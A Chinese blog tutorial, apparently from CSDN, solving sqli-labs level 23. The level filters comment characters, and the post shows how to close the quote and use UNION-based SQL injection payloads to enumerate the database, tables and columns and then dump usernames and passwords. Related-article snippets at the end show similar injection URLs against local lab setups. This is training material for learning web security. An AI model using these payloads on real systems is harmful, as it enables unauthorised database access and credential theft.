SQL注入详解 23-28关

最新推荐文章于 2023-08-03 13:49:28 发布
最新推荐文章于 2023-08-03 13:49:28 发布
阅读量806 收藏 4
点赞数 3
分类专栏: Mysql注入天书
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45744814/article/details/120534699
版权

SQL注入 联合注入 报错注入 过滤绕过 安全防护
关键词由CSDN通过智能技术生成

目录

Less-23(过滤注释符号——union联合注入)

第23关总结:
通过手工测试发现,这一关对#与–+进行了过滤,我们只能想办法来闭合单引号,并且闭合的方法很多,在以下的注入过程中也存在很多的闭合办法。其余的采用简单的联合注入即可完成

  1. 判断注入类型并判断显示位置

1.1通过报错,我们可以看出这个注入大概是个单引号字符型注入
在这里插入图片描述
1.2 通过测试,发现这一关禁用了‘#’与‘–+’,所以我们不能像前面一样去注释剩余的单引号,而是去想办法闭合
在这里插入图片描述
1.3 闭合单引号,判断显示位置

-1' union select 22,33,'44

在这里插入图片描述

  1. 查看当前数据库
-1' union select 3,database(),3 or '12'='12

在这里插入图片描述

  1. 爆表
-1' union select 22,group_concat(table_name),22 from information_schema.tables where table_schema='security' and '1'='1

在这里插入图片描述

  1. 爆列
-1' union select 22,group_concat(column_name),22 from information_schema.columns where table_name='users' or '1'='2

在这里插入图片描述

  1. 爆数据
    方法一:
-1' union select 1,group_concat(username),3 from users where 1=1 and '1'='1

在这里插入图片描述
解析:
这里需要注意and前后的对象需要一致,下面的第一种做法就不对,and前面是一个表名,后面就是数值,所以再注释的闭合引号的的时候需要加一个where 1=1,前面爆表,爆列的时候由于本来就有where条件筛选,所以才可以成功
在这里插入图片描述

方法二:

-1' union select 22,(select group_concat(username) from users),22 or '1'='1
-1' union select 22,(select group_concat(password) from users),22'

在这里插入图片描述
在这里插入图片描述
查看源码:
通过源码我们可以看出来这里将#与–替换成了空字符,对#与–起到过滤作用,所以我们前面的判断是正确的
在这里插入图片描述

最低0.47元/天 解锁文章
君莫hacker
关注
专栏目录
渗透测试23---SQL注入实战2
初遇我ㄖ寸の热情呢?
04-14 7800
1.SQL盲注 盲注就是有些信息看不到了,通过一些特别的技巧啊。利用逻辑判断,往往页面上只是简单的提示成功不成功。没有详细的具体的信息。 报错的信息盲注就是,什么信息都没有。但是系统还是有缺陷的。如果在运行过程中,里面出现一些额外的信息报错了,那也会回显出来。 基于时间的盲注,通过时间长短的变化,判断语句是否执行成功 布尔型盲注 猜数据库名 uname=admin" and left(da...
SQL注入漏洞详解
热门推荐
谢公子的博客
07-26 9万+
目录 SQL注入的分类 判断是否存在SQL注入 一:Boolean盲注 二:union 注入 三:文件读写 四:报错注入 floor报错注入 ExtractValue报错注入 UpdateXml报错注入 五:时间盲注 六:REGEXP正则匹配 七:宽字节注入 八:堆叠注入 九:二次注入 十:User-Agent注入 十一:Cookie注入 十二:过滤绕过 十三......
SQL注入分析-less-26
qq_33505576的博客
02-15 1281
SQL注入分析-less-26 近期在学习SQL注入的知识,在此呢,写篇博客记录一下手工注入的过程,中间走的弯路呢就不多提了,主要把自己成功注入的过程和结果在此做一个记录,不喜勿喷哈! 1、按照提示,在地址栏输入参数 http://192.168.88.129/sqli-labs-master/Less-26/?id=1 结果如下,正常回显: 使用单引号看看页面会报什么信息: http://192.168.88.129/sqli-labs-master/Less-26/?id=1’ 从这里判断
基于Sqli-Labs靶场的SQL注入-25~28
Joker
01-07 1500
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、unionselect 的绕过。
Sqli_labs第二十五(报错注入)
m0_65463546的博客
12-18 381
本人呢也是学习Sql注入不久的小白,可能对此题理解的也不是很透彻,但是也算摸爬滚打的把这题做出来了,跟大家一起分享分享,有什么不足的地方欢迎大家指正!相信做到这里的小伙伴对什么是联合注入、盲注啊,单引号爆点位这种基本注入方式已经很熟悉了,我也不做过多的废话在这上面,直接开始我们的正题。
Sql注入
aetlypdlg_ys的博客
01-24 1573
联合注入 判断注入点 GET['id'] ?id=n eg:127.0.0.1/sqli-labs/Less-1/?id=1 %23(#):过滤后面的语句 eg:127.0.0.1/sqli-labs/Less-1/?id=1' %23 加 ' 报错,再加%23(#)不报错,可判断一个注入点 整型注入:注入的是1,2,3...... 字符型注入:注入的是a,b,c,def...... 判断显示位(列) order by n n>列数 -->报错 n<=列数 --&
五分钟快速搞懂什么是SQL注入-SQL注入详解(干货满满)
最新发布
03-28
本文是一篇SQL注入详解,专为初学者设计。文章以通俗易懂的语言和幽默感,介绍了SQL注入的概念、防范方法、实际案例等。通过生动的例子和简单的故事,读者可以快速上手SQL注入,并在实际项目中应用。 ### 适用...
SQL注入详解(扫盲篇)
09-09
SQL注入是一种常见的网络安全威胁,它发生在web应用程序中,由于开发者未能正确过滤或验证用户输入的数据,使得攻击者能够向数据库提交恶意的SQL语句。在本文中,我们将深入理解SQL注入的基本概念、工作原理以及常见...
sql注入 Less-26-31
lyy0xfff的博客
07-23 380
ContentsPreface本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!!Less-26Less-26aLess-27Less-27aLess-28Less-28aLess-29Less-30 Preface 本博文仅用于信息安全防御教学,请遵守中华人民共和国网络安全法!! Less-26 0x00 由题干我们知道,它对我们的空格和一些内容进行了过滤,经过我尝试,我发现,它过滤了我们的 and 、or 、 # 、– 因为空格无法进行双写,所以我们必须要想办法绕过空格过滤 首先我们根据题目
sqli-labs-master第23
m_ing
05-17 1194
前言:从一开始我们是GET-----POST的路线来研究sql注入,这我们在从头早来研究GET请求方式。 http://192.168.89.139/sqli-labs-master/Less-23/ 我看到这个页面很是熟悉,提示我们输入id值作为参考。 我们加个’试一下 再来利用and来测试下,加入注释符#,编码成%23同样的报错 我们感到很好奇,还是看下原本代码 对注释符等都进行了过滤 突然一懵,我查阅了一些资料,只能采用单引号闭合的方法来绕过了,我们试试看! ?id 1=1’ and ‘1’=
SQL-LABS 25
qq_52863655的博客
08-26 258
第二十五: 直接开始验证它的闭合符号。发现是单引号闭合,然后查列 利用 order by http://127.0.0.1/sqli/Less-25/?id=122’ order by 2 查看底下的蓝字发现少了or 所以猜测对or进行了绕过。所以采用union select进行查询 http://127.0.0.1/sqli/Less-25/?id=122union select 1,2,3–+ 可以查询出。接下来就是常规注入。 查库:http://127.0.0.1/sqli/Less-25/?
SQL注入之二次注入(sql-lab第24
_Co1a
12-22 1409
什么是二次注入 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户 输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 二次注入原理分为两步 二次注入,可以概括为以下两步: 第一步:插入恶意数据 进行数据库插入数据时,对其中的特殊字符进行了转义处理,在写入数据库的时候又保留了原来的数据。 第二
九、SQL-labs的第24——二次注入(Post)
qq_73393033的博客
08-03 554
二次注入首先的一点就要在HTTP请求中提交恶意代码,将这个恶意代码存储在数据库中,以便后面使用。在第24,我们是通过注册新账号这种方式,将恶意代码存储到数据库中。假设我们的攻击目标是Dummy。
[SQL注入][Advanced injection]sqli-labs学习记录(23-37)
Y4tacker的博客
08-10 6064
学习记录前置知识二次排序注入思路服务器架构(以靶场为例)---参考Mysql天书第23 ------ 注释符号过滤第24 ------ 二次注入第25 ------ or与and过滤第25a ------ or与and过滤第26 ------ 注释and与or与空格第26a ------ 不使用报错注入第27 ----- 大小写或双写绕过第27a ------ 稍微加强了过滤规则第28 ------ 同27没区别第28a ------ 第28简化版(没意义)![在这里插入图片描述](
sqli-labs (less-28 and less-28a)
kukudeshuo的博客
03-12 930
sqli-labs (less-28 and less-28a) less-28 进入28,输入ID=1 查看源代码 这里发现基本与27一样,依然采用大小写混合绕过 http://127.0.0.1/sql1/Less-28/?id=1' #回显错误 http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示 判断闭合方式为’);%00,并且为字符型注入 确定回显位置 http://127.0.0.1/sql1/Less-28/?id=111') %a0 Un
生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 427
sql-lib项目,本篇文章介绍卡21-25。 闭合变成了双引号,其余和上一一样。 这一过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
SQL注入分析
zhangmiaoping23的专栏
11-22 1320
检测诸如点: Request URI: /***.asp?id=16' and char(124)+user+char(124)=0 and ''=' Request URI: /***.asp?id=16 and 1=1 检测的URL: Request URI: /***..asp?id=234' and char(124)+user+char(124)=0 and ''=' Requ
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值